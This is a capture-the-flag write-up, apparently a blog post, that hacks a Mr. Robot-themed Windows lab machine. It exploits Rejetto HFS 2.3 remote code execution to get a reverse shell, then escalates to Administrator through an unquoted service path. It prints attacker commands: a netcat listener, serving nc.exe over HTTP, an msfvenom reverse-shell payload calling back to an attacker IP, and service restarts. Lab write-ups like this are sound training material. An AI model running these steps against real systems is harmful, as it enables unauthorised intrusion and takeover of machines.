Hack into a Mr. Robot themed Windows machine.

Introduction

In this room, we will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

Scanning & Enumeration

Nmap Scan

root@fs0ci3ty:~# nmap -sV -A 10.10.240.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 15:55 IST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
root@fs0ci3ty:~# nmap -sV -A -Pn 10.10.240.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 15:55 IST
Nmap scan report for 10.10.240.218
Host is up (0.54s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-08-02T10:29:39+00:00; +7s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49161/tcp open  msrpc              Microsoft Windows RPC
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6s
| smb2-security-mode: 
|   3.00: 
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 443/tcp)
HOP RTT    ADDRESS
1   ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.28 seconds

We notice the following services:

1. HTTP and
2. Samba

Enumerate the Services

Version Enumeration Table

HTTP Enumeration

Landing Page

The landing page shows ‘Employee of the month’. I actually love the Mr. Robot series, so I know his name is Bill Harper. He was a victim of Elliot’s social engineering plan :P
To those who do not know who he is, do not worry

View Source shows the name of the Employee

The next step in enumerating a web server is using gobuster. That did not find anything on the server. The next step is going on the other port i.e. 8080.

HTTP File Server

The highlighted part is important because it tells us what software a particular server is running. On clicking ‘HttpFileServer 2.3’ we find that the server is using Rejetto HTTP File Server.

HTTP File Server Source Page

Now before enumerating more, since this looks like a service that is not custom, we can jump to analyzing if this Rejetto thing is vulnerable or not.

Vulnerability Analysis

A quick searchsploit suggests that we have multiple vulnerabilities for Rejetto.

searchsploit search results

We are more interested in remote code execution.

Search for remote exploits for Rejetto

Interesting Exploit on Exploit Database

Before we start exploitation, let us read the comments in the exploit

Exploit Usage

Important note: we need to host nc.exe, essentially a netcat binary, on our attacker machine, honestly, I missed this the first time.

I took a break, and when I came back with a fresh approach, I saw this.

Exploitation

Let us first get ‘nc.exe’

A quick search provided me with a repo — ‘https://github.com/int0x33/nc.exe?files=1’

We follow the following steps:

1. Download ‘nc.exe’
2. Run an HTTP server using python, sudo python3 -m http.server 80
   Note: we use sudo here because port 80 is usually used by apache, and a normal user can not start the server on port 80.
3. Next, we set up our netcat listener ‘nc -nlvp 4445’
4. Edit the code to add attacker’s IP address and the port our netcat listener is listening on
5. After that, we can run our ‘exploit.py’ using python exploit.py <target-ip> several times until our shell pops up!

Modify the exploit script

Receiving the Reverse Shell

Once we get access to the base user, we can go ahead and grab our user.txt

Shell with User Privileges

Privesc

Privesc on Windows is something I am not at all aware of. I do not know how it is done, or which direction to look into. So I am going to follow the method that TryHackMe points me into.

So they go on ahead and say that we need to put winPEAS.exe on the victim machine.

WinPEAS? What is that?

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git

Path for obfuscated binaries

I cloned this to get the WinPEAS executable, we could also compile it on our own, but in this part, let us use the pre-compiled version.

Get the executable, and then start an HTTP server using - sudo python3 -m http.server 80

Make sure you start the python server where the executable is available.

Let us take a moment here and try to understand what we are going to do next.

When we run WinPEAS, it is just like LinEnum, and it would enumerate all the services and permissions and information that we will be able to use to escalate our access.

According to TryHackMe,

further instructions

running winPEAS will point us towards unquoted paths. Once again, what is UNQUOTED PATHS

I googled the same and came across a nice blog by Orhan YILDIRIM which talks about Unquoted Paths on windows here and another one by Sumit Verma which can be found here.

Now that we have some clarity, let us continue where we stopped, drop our winPEAS on to the target, and get some juicy stuff!

Downloading winPEAS from attacker to target machine

Once we have our winPEAS on the target machine, let us run the executable and notice the output.

winPEAS output

This suggests that ‘Red’ is the color we are going to be looking out for. Well, let’s do this

Interesting Results

We see a couple of services that are running that have this two important highlights:
1. No quotes and space detected
2. File Permissions: Bill. We can read as well as write data.

Services
1. Advanced SystemCare
2. IObit Uninstaller Service
3. LiveUpdate
We also notice that the path for all three services is the same i.e. ‘C:\Program Files (x86)\IObit’, let us change our working directory to this path.

Three services highlight the same characteristics. Now that we know this, all we need to know is if we can start, stop and restart any of these 3 services.
We can check that using ‘icacls’

Checking Permissions

Now that we know we have all the permissions, we can create a payload using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.4.9.255 LPORT=5555 -f exe -o Advanced.exe

Generating Payload

Let us upload it to the directory, ‘C:\Program Files (x86)\IObit\’, thus the path for Advanced.exe would be ‘C:\Program Files (x86)\IObit\Advanced.exe’ and when the service restarts this will help us because, there is a space in the path provided by the service, and instead of going in inside the ‘Advanced SystemCare’ folder, it will directly execute Advanced.exe.

Let us set up the listener on port 5555.

Then we stop the service using sc stop AdvancedSystemCareService9

And then we start it again using sc start AdvancedSystemCareService9

And bam! We have our admin shell!

Shell with Admin Privileges

We can now get our root.txt

Root Flag

Parting Thoughts

We learned a new concept in this room for privesc. Also, I have not added the metasploit part here but just in case you are interested, here’s another blog that has that part covered here.

The main vulnerability was UNQUOTED PATHS.